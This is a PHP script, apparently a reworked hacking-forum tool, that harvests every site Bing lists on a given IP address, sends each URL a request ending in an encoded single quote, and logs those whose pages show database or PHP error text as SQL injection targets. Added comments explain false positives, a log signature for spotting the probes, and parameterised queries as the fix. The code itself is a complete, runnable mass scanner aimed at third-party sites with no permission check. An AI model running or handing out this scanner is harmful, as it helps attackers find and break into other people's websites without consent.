- <?php
- //ReCoded by Pendekar Hitam - Fiber Linux
- //Thanks to Lagripe-Dz
- //Add some new - error/function/logs/ping timeout/minor info
- //Malaysia Newbi3
// Runtime setup: lift the execution time limit and request full error
// reporting; the leading @ silences any warning from the calls themselves.
@set_time_limit(0);
@error_reporting(E_ALL | E_NOTICE);

// Two positional arguments are required: argv[1] is the IP address whose
// co-hosted sites are looked up, argv[2] is the file that matches are appended to.
// The check is a truthiness test, so an argument of "0" or "" also counts as missing.
$usageBanner = "
================================================================================
USAGE : php sql.php [IP] [FILENAME]
Example : php sql.php 127.0.0.1 sql.txt
Blog : cyb3rsyn.blogspot.com
================================================================================
";
if (!$argv[1] || !$argv[2]) {
    print_r($usageBanner);
    die();
}
/**
 * Classifies one response body against a list of error-text signatures and
 * appends the URL to the output file when any of them is present.
 *
 * The signature is a case-insensitive alternation of MySQL/PostgreSQL/PHP error
 * fragments. As written, each "()" is an empty regex group, so the function-name
 * entries match the bare name (e.g. "session_start"), and "SELECT * FROM" matches
 * "SELECT" followed by spaces and "FROM", not a literal asterisk. Generic entries
 * such as "Syntax error" and "Fatal error" match any page that contains that text,
 * so an entry in the output file is an unverified candidate, not a confirmed flaw.
 *
 * Defensive reading: an application that returns a generic error page with no
 * database or PHP error text produces no match here. That hides the signal this
 * check relies on; the underlying query still needs to be parameterised.
 *
 * @param string       $url      URL being reported (written to the log unchanged)
 * @param string|false $source   response body to inspect
 * @param string       $filename path of the file that matching URLs are appended to
 */
function check_url($url, $source, $filename)
{
    $signature = "/error in your SQL syntax|mysql_fetch_array()|array_merge()|execute query|filesize()|getimagesize()|pg_exec()|mysql_fetch_object()|mysql_num_rows()|mysql_result()|session_start()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i";

    // No signature in the body: report and stop.
    if (!preg_match($signature, $source)) {
        echo "[-] Not Found -> $url\n";
        return;
    }

    echo "[+] Found -> $url\n";
    // Append mode, so earlier results in the same file are kept.
    // NOTE(review): the fopen() result is not checked before fwrite().
    $log = fopen($filename, "a+");
    fwrite($log, $url . "\n");
}
/**
 * Fetches one URL with an encoded single quote (%27) appended and hands the
 * response body to check_url() for signature matching.
 *
 * What this looks like in a web server's access log: one GET per harvested URL
 * whose request line ends in %27. The fetch goes through PHP's HTTP stream
 * wrapper, which with PHP's default configuration sends no User-Agent header,
 * so a run of quote-terminated requests without a User-Agent is a usable
 * detection pattern. Parameterised queries remove the flaw being probed for;
 * turning off verbose error output only removes the text check_url() keys on.
 *
 * @param string $site      URL to probe, as harvested from the search results
 * @param string $filename2 path of the file that matching URLs are appended to
 */
function check_sql_inj($site, $filename2)
{
    $probeUrl = $site . "%27";
    // @ hides fetch warnings; on failure $body is false and no signature matches.
    $body = @file_get_contents($probeUrl);
    check_url($site, $body, $filename2);
}
/**
 * Returns the offset of the first case-insensitive occurrence of $needle in
 * $haystack, built from stristr() + strpos().
 *
 * When $needle does not occur, stristr() returns false and that value is passed
 * to strpos() as the needle; the result then depends on the PHP version.
 *
 * @param string $haystack text to search in
 * @param string $needle   text to search for
 * @return int|false
 */
function mystripos($haystack, $needle)
{
    // Tail of the haystack starting at the match, in its original casing.
    $tail = stristr($haystack, $needle);

    return strpos($haystack, $tail);
}
/**
 * Reduces a URL to its host part: removes every "http://" and "www." occurrence,
 * then keeps the text before the first "/".
 *
 * Only the "http://" scheme is stripped; an "https://" URL is cut at the slash
 * that follows the scheme. Nothing in the visible listing calls this function.
 *
 * @param string $ent URL to reduce
 * @return string text preceding the first "/" after the replacements
 */
function sec($ent)
{
    $stripped = str_replace("www.", "", str_replace("http://", "", $ent));
    $cut = mystripos($stripped, "/");

    return substr($stripped, 0, $cut);
}
// Harvest phase: page through Bing results for the query `ip:<address> id=` and
// collect every result link. All traffic in this phase goes to bing.com; the
// hosts behind $ip receive nothing until the probe loop later in the script.
// NOTE(review): $ip is concatenated into the query string without URL-encoding.
$npages = 50000;   // upper bound for the `first=` result offset
$npage = 1;        // current result offset; advances by 10 per page
$allLinks = array();
$ip = $argv[1];

while ($npage <= $npages) {
    $ch = curl_init();
    curl_setopt_array($ch, array(
        CURLOPT_URL => 'http://www.bing.com/search?q=ip%3A' . $ip . '+id=&first=' . $npage,
        CURLOPT_HEADER => 1,            // response headers are kept in the returned text
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_CONNECTTIMEOUT => 5,    // connect timeout only; no overall transfer timeout is set
        CURLOPT_REFERER => 'http://www.bing.com/',
        CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8',
    ));
    $page = curl_exec($ch);
    $curlError = curl_error($ch);
    curl_close($ch);

    // Any transport error ends the harvest with whatever was collected so far.
    if (!empty($curlError)) {
        break;
    }

    // Capture group 1 is the href of each result; the pattern expects the
    // `sb_tlst` result markup — presumably the Bing layout at the time, verify.
    preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $page, $findlink);
    $found = count($findlink[1]);
    for ($i = 0; $i < $found; ++$i) {
        $allLinks[] = $findlink[1][$i];
    }

    // Stop when the page carries no link to the next offset.
    $npage += 10;
    if (preg_match('(first=' . $npage . '&)siU', $page) == 0) {
        break;
    }
}
// Copy the harvested links, drop duplicates and sort them. Despite the variable
// name, the entries are the full result URLs, not domain names.
$allDmns = array();
foreach ($allLinks as $link) {
    array_push($allDmns, $link);
}
$resultPages = array_unique($allDmns);
sort($resultPages);   // also re-indexes the list from 0
print_r("
================================================================================
SQL Injection Server Scanner v2.0
Re(c)oded By Pendekar Hitam
cyb3rsyn.blogspot.com
================================================================================
");

// Probe phase: one quote-suffixed request per unique harvested URL; matches are
// appended to the file named by argv[2]. This is the only phase that sends
// traffic to the enumerated sites.
foreach ($resultPages as $candidateUrl) {
    check_sql_inj($candidateUrl, $argv[2]);
}

// The "Domain Scanned" figure is the number of unique URLs probed.
$scanned = count($resultPages);
print_r("
================================================================================
INFO / IP : {$ip} / Domain Scanned : {$scanned}
FINISHED
================================================================================
");
- ?>